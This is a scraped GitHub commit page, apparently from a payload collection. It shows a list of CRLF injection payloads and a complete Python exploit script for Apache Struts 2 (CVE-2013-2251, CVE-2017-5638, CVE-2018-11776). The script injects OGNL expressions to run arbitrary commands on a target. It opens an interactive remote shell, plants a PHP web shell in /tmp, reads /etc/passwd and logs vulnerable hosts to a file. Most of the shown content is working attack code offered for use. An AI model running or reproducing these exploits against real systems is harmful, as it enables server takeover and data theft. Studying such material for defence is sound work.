-
-
Notifications
You must be signed in to change notification settings - Fork 14.9k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Deployed 8c09568 with MkDocs version: 1.6.1
- Loading branch information
Swk
committed
Nov 30, 2024
0 parents
commit adf0ab9
Showing
619 changed files
with
874,820 additions
and
0 deletions.
There are no files selected for viewing
Empty file.
Large diffs are not rendered by default.
Oops, something went wrong.
Large diffs are not rendered by default.
Oops, something went wrong.
Large diffs are not rendered by default.
Oops, something went wrong.
Large diffs are not rendered by default.
Oops, something went wrong.
Large diffs are not rendered by default.
Oops, something went wrong.
Large diffs are not rendered by default.
Oops, something went wrong.
Large diffs are not rendered by default.
Oops, something went wrong.
Large diffs are not rendered by default.
Oops, something went wrong.
Large diffs are not rendered by default.
Oops, something went wrong.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,17 @@ | ||
/%%0a0aSet-Cookie:crlf=injection | ||
/%0aSet-Cookie:crlf=injection | ||
/%0d%0aSet-Cookie:crlf=injection | ||
/%0dSet-Cookie:crlf=injection | ||
/%23%0aSet-Cookie:crlf=injection | ||
/%23%0d%0aSet-Cookie:crlf=injection | ||
/%23%0dSet-Cookie:crlf=injection | ||
/%25%30%61Set-Cookie:crlf=injection | ||
/%25%30aSet-Cookie:crlf=injection | ||
/%250aSet-Cookie:crlf=injection | ||
/%25250aSet-Cookie:crlf=injection | ||
/%2e%2e%2f%0d%0aSet-Cookie:crlf=injection | ||
/%2f%2e%2e%0d%0aSet-Cookie:crlf=injection | ||
/%2F..%0d%0aSet-Cookie:crlf=injection | ||
/%3f%0d%0aSet-Cookie:crlf=injection | ||
/%3f%0dSet-Cookie:crlf=injection | ||
/%u000aSet-Cookie:crlf=injection |
Large diffs are not rendered by default.
Oops, something went wrong.
Large diffs are not rendered by default.
Oops, something went wrong.
215 changes: 215 additions & 0 deletions
215
CVE Exploits/Apache Struts 2 CVE-2013-2251 CVE-2017-5638 CVE-2018-11776_.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,215 @@ | ||
#!/usr/bin/python | ||
|
||
from __future__ import print_function | ||
from future import standard_library | ||
standard_library.install_aliases() | ||
from builtins import input | ||
from builtins import str | ||
import urllib.request, urllib.error, urllib.parse | ||
import time | ||
import sys | ||
import os | ||
import subprocess | ||
import requests | ||
import readline | ||
import urllib.parse | ||
|
||
RED = '\033[1;31m' | ||
BLUE = '\033[94m' | ||
BOLD = '\033[1m' | ||
GREEN = '\033[32m' | ||
OTRO = '\033[36m' | ||
YELLOW = '\033[33m' | ||
ENDC = '\033[0m' | ||
|
||
def cls(): | ||
os.system(['clear', 'cls'][os.name == 'nt']) | ||
cls() | ||
|
||
logo = BLUE+''' | ||
___ _____ ___ _ _ _____ ___ | ||
( _`\(_ _)| _`\ ( ) ( )(_ _)( _`\ | ||
| (_(_) | | | (_) )| | | | | | | (_(_) | ||
`\__ \ | | | , / | | | | | | `\__ \ | ||
( )_) | | | | |\ \ | (_) | | | ( )_) | | ||
`\____) (_) (_) (_)(_____) (_) `\____) | ||
=[ Command Execution v3]= | ||
By @s1kr10s | ||
'''+ENDC | ||
print(logo) | ||
|
||
print(" * Ejemplo: http(s)://www.victima.com/files.login\n") | ||
host = input(BOLD+" [+] HOST: "+ENDC) | ||
|
||
if len(host) > 0: | ||
if host.find("https://") != -1 or host.find("http://") != -1: | ||
|
||
poc = "?redirect:${%23w%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23w.println%28%27mamalo%27%29,%23w.flush%28%29,%23w.close%28%29}" | ||
|
||
def exploit(comando): | ||
exploit = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+comando+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}" | ||
return exploit | ||
|
||
def exploit2(comando): | ||
exploit2 = "Content-Type:%{(+++#_='multipart/form-data').(+++#[email protected]@DEFAULT_MEMBER_ACCESS).(+++#_memberAccess?(+++#_memberAccess=#dm):((+++#container=#context['com.opensymphony.xwork2.ActionContext.container']).(+++#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(+++#ognlUtil.getExcludedPackageNames().clear()).(+++#ognlUtil.getExcludedClasses().clear()).(+++#context.setMemberAccess(+++#dm)))).(+++#shell='"+str(comando)+"').(+++#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(+++#shells=(+++#iswin?{'cmd.exe','/c',#shell}:{'/bin/sh','-c',#shell})).(+++#p=new java.lang.ProcessBuilder(+++#shells)).(+++#p.redirectErrorStream(true)).(+++#process=#p.start()).(+++#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(+++#process.getInputStream(),#ros)).(+++#ros.flush())}" | ||
return exploit2 | ||
|
||
def exploit3(comando): | ||
exploit3 = "%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%[email protected]@getRuntime%28%29.exec%28%27"+comando+"%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%[email protected]@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D" | ||
return exploit3 | ||
|
||
def pwnd(shellfile): | ||
exploitfile = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+shellfile+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}" | ||
return exploitfile | ||
|
||
def validador(): | ||
arr_lin_win = ["file%20/etc/passwd","dir","net%20users","id","/sbin/ifconfig","cat%20/etc/passwd"] | ||
return arr_lin_win | ||
|
||
#def reversepl(ip,port): | ||
# print "perl" | ||
|
||
#def reversepy(ip,port): | ||
# print "python" | ||
|
||
# CVE-2013-2251 --------------------------------------------------------------------------------- | ||
try: | ||
response = '' | ||
response = urllib.request.urlopen(host+poc) | ||
except: | ||
print(RED+" Servidor no responde\n"+ENDC) | ||
exit(0) | ||
|
||
print(BOLD+"\n [+] EJECUTANDO EXPLOIT CVE-2013-2251"+ENDC) | ||
|
||
if response.read().find("mamalo") != -1: | ||
print(RED+" [-] VULNERABLE"+ENDC) | ||
owned = open('vulnsite.txt', 'a') | ||
owned.write(str(host)+'\n') | ||
owned.close() | ||
|
||
opcion = input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC) | ||
#print BOLD+" * [SHELL REVERSA]"+ENDC | ||
#print OTRO+" Struts@Shell:$ reverse 127.0.0.1 4444 (perl,python,bash)\n"+ENDC | ||
if opcion == 's': | ||
print(YELLOW+" [-] GET PROMPT...\n"+ENDC) | ||
time.sleep(1) | ||
print(BOLD+" * [UPLOAD SHELL]"+ENDC) | ||
print(OTRO+" Struts@Shell:$ pwnd (php)\n"+ENDC) | ||
|
||
while 1: | ||
separador = input(GREEN+"Struts2@Shell_1:$ "+ENDC) | ||
espacio = separador.split(' ') | ||
comando = "','".join(espacio) | ||
|
||
if espacio[0] != 'reverse' and espacio[0] != 'pwnd': | ||
shell = urllib.request.urlopen(host+exploit("'"+str(comando)+"'")) | ||
print("\n"+shell.read()) | ||
elif espacio[0] == 'pwnd': | ||
pathsave=input("path EJ:/tmp/: ") | ||
|
||
if espacio[1] == 'php': | ||
shellfile = """'python','-c','f%3dopen("/tmp/status.php","w");f.write("<?php%20system($_GET[ksujenenuhw])?>")'""" | ||
urllib.request.urlopen(host+pwnd(str(shellfile))) | ||
shell = urllib.request.urlopen(host+exploit("'ls','-l','"+pathsave+"status.php'")) | ||
if shell.read().find(pathsave+"status.php") != -1: | ||
print(BOLD+GREEN+"\nCreate File Successful :) ["+pathsave+"status.php]\n"+ENDC) | ||
else: | ||
print(BOLD+RED+"\nNo Create File :/\n"+ENDC) | ||
|
||
# CVE-2017-5638 --------------------------------------------------------------------------------- | ||
print(BLUE+" [-] NO VULNERABLE"+ENDC) | ||
print(BOLD+" [+] EJECUTANDO EXPLOIT CVE-2017-5638"+ENDC) | ||
x = 0 | ||
while x < len(validador()): | ||
valida = validador()[x] | ||
|
||
try: | ||
req = urllib.request.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit2(str(valida))}) | ||
result = urllib.request.urlopen(req).read() | ||
|
||
if result.find("ASCII") != -1 or result.find("No such") != -1 or result.find("Directory of") != -1 or result.find("Volume Serial") != -1 or result.find("inet") != -1 or result.find("root:") != -1 or result.find("uid=") != -1 or result.find("accounts") != -1 or result.find("Cuentas") != -1: | ||
print(RED+" [-] VULNERABLE"+ENDC) | ||
owned = open('vulnsite.txt', 'a') | ||
owned.write(str(host)+'\n') | ||
owned.close() | ||
|
||
opcion = input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC) | ||
if opcion == 's': | ||
print(YELLOW+" [-] GET PROMPT...\n"+ENDC) | ||
time.sleep(1) | ||
|
||
while 1: | ||
try: | ||
separador = input(GREEN+"\nStruts2@Shell_2:$ "+ENDC) | ||
req = urllib.request.Request(host, None, {'User-Agent': 'Mozilla/5.0', 'Content-Type': exploit2(str(separador))}) | ||
result = urllib.request.urlopen(req).read() | ||
print("\n"+result) | ||
except: | ||
exit(0) | ||
else: | ||
x = len(validador()) | ||
else: | ||
print(BLUE+" [-] NO VULNERABLE "+ENDC + "Payload: " + str(x)) | ||
except: | ||
pass | ||
x=x+1 | ||
|
||
# CVE-2018-11776 --------------------------------------------------------------------------------- | ||
print(BLUE+" [-] NO VULNERABLE"+ENDC) | ||
print(BOLD+" [+] EJECUTANDO EXPLOIT CVE-2018-11776"+ENDC) | ||
x = 0 | ||
while x < len(validador()): | ||
#Filtramos la url solo dominio | ||
url = host.replace('#', '%23') | ||
url = host.replace(' ', '%20') | ||
if ('://' not in url): | ||
url = str("http://") + str(url) | ||
scheme = urllib.parse.urlparse(url).scheme | ||
site = scheme + '://' + urllib.parse.urlparse(url).netloc | ||
|
||
#Filtramos la url solo path | ||
file_path = urllib.parse.urlparse(url).path | ||
if (file_path == ''): | ||
file_path = '/' | ||
|
||
valida = validador()[x] | ||
try: | ||
result = requests.get(site+"/"+exploit3(str(valida))+file_path).text | ||
|
||
if result.find("ASCII") != -1 or result.find("No such") != -1 or result.find("Directory of") != -1 or result.find("Volume Serial") != -1 or result.find("inet") != -1 or result.find("root:") != -1 or result.find("uid=") != -1 or result.find("accounts") != -1 or result.find("Cuentas") != -1: | ||
print(RED+" [-] VULNERABLE"+ENDC) | ||
owned = open('vulnsite.txt', 'a') | ||
owned.write(str(host)+'\n') | ||
owned.close() | ||
|
||
opcion = input(YELLOW+" [-] RUN THIS EXPLOIT (s/n): "+ENDC) | ||
if opcion == 's': | ||
print(YELLOW+" [-] GET PROMPT...\n"+ENDC) | ||
time.sleep(1) | ||
print(BOLD+" * [UPLOAD SHELL]"+ENDC) | ||
print(OTRO+" Struts@Shell:$ pwnd (php)\n"+ENDC) | ||
|
||
while 1: | ||
separador = input(GREEN+"Struts2@Shell_3:$ "+ENDC) | ||
espacio = separador.split(' ') | ||
comando = "%20".join(espacio) | ||
|
||
shell = urllib.request.urlopen(host+exploit3(str(comando))) | ||
print("\n"+shell.read()) | ||
|
||
else: | ||
x = len(validador()) | ||
exit(0) | ||
else: | ||
print(BLUE+" [-] NO VULNERABLE "+ENDC + "Payload: " + str(x)) | ||
except: | ||
pass | ||
x=x+1 | ||
else: | ||
print(RED+" Debe introducir el protocolo (https o http) para el dominio\n"+ENDC) | ||
exit(0) | ||
else: | ||
print(RED+" Debe Ingresar una Url\n"+ENDC) | ||
exit(0) |
Oops, something went wrong.